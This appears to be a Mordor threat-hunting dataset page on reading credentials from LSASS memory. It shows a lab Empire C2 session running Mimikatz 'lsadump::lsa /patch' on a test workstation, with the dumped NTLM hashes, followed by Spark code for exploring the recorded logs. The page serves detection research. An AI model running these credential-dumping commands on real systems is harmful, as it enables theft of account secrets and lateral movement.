Empire Mimikatz Lsadump LSA Patch¶

Metadata¶


Author	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2019/05/18
Modification Date	2020/09/20
Tactics	[‘TA0006’]
Techniques	[‘T1003.001’]
Tags	[‘LSASS Memory Credentials Read’]

Dataset Description¶

This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.

Datasets Downloads¶

Dataset Type	Link
Host	https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip

Notebooks¶

Notebooks created by the community leveraging the mordor datasets

Author	Name	Link
Threat Hunter Playbook	LSASS Access from Non System Account	https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html

Simulation Plan¶

Environment	Tool Type	Module
Mordor shire	C2	lsadump

Adversary View¶

(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*
(Empire: powershell/credentials/mimikatz/lsadump) > info

              Name: Invoke-Mimikatz LSA Dump
            Module: powershell/credentials/mimikatz/lsadump
        NeedsAdmin: True
        OpsecSafe: True
          Language: powershell
MinLanguageVersion: 2
        Background: True
  OutputExtension: None

Authors:
  @JosephBialek
  @gentilkiwi

Description:
  Runs PowerSploit's Invoke-Mimikatz function to extract a
  particular user hash from memory. Useful on domain
  controllers.

Comments:
  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt
  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls
  a

Options:

  Name     Required    Value                     Description
  ----     --------    -------                   -----------
  Agent    True        B7Y8G4XC                  Agent to run module on.                 
  Username False                                 Username to extract the hash for, blank 
                                                for all local passwords.                

(Empire: powershell/credentials/mimikatz/lsadump) > execute
[*] Tasked B7Y8G4XC to run TASK_CMD_JOB
[*] Agent B7Y8G4XC tasked with task ID 2
[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump
(Empire: powershell/credentials/mimikatz/lsadump) > 
Job started: VGHXZ5

Hostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > http://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380

RID  : 000001f7 (503)
User : DefaultAccount
LM   : 
NTLM : 

RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 

RID  : 000001f4 (500)
User : wardog
LM   : 
NTLM : 42ddb2963bbe8f1c075fc869d3bce33e

RID  : 000001f8 (504)
User : WDAGUtilityAccount
LM   : 
NTLM : 45a313f1860be24e967e55b94649aa31

(Empire: powershell/credentials/mimikatz/lsadump) >

Explore Mordor Dataset¶

Initialize Analytics Engine¶

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File¶

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")

[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data¶

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)

+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |2859 |
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |2505 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |279  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |162  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |150  |
|WORKSTATION5.theshire.local|Security                                |5156   |79   |
|MORDORDC.theshire.local    |Security                                |4658   |64   |
|MORDORDC.theshire.local    |Security                                |5158   |61   |
|MORDORDC.theshire.local    |Security                                |5156   |55   |
|WORKSTATION5.theshire.local|Security                                |5158   |48   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |48   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |3      |38   |
|WORKSTATION6.theshire.local|Security                                |5156   |38   |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |37   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |3      |36   |
|WORKSTATION6.theshire.local|Security                                |4703   |32   |
|MORDORDC.theshire.local    |Security                                |4656   |32   |
|MORDORDC.theshire.local    |Security                                |4663   |32   |
|MORDORDC.theshire.local    |Security                                |4690   |32   |
|MORDORDC.theshire.local    |Microsoft-Windows-Sysmon/Operational    |10     |30   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows

Empire Powerdump Extract Hashes Covenant DCSync